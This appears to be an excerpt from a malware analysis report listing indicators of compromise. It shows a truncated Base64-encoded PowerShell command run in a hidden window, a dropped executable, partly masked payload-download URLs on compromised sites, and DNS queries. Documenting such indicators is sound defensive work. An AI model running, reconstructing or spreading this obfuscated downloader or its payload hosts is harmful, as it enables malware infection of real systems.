Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...
- %HOMEPATH%\427.exe
- %HOMEPATH%\427.exe
- 'fu###.com.tw':443
- http://st#####.securenetworks.pk/mn2shwl/UGw/
- http://co###sjapan.vn/wp-includes/a/hotoffice/v2u90/
- http://al###adatv.cl/wp-includes/gzl80H1/
- DNS ASK st#####.securenetworks.pk
- DNS ASK co###sjapan.vn
- DNS ASK gr##eobd.co
- DNS ASK al###adatv.cl
- DNS ASK fu###.com.tw
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...' (with hidden window)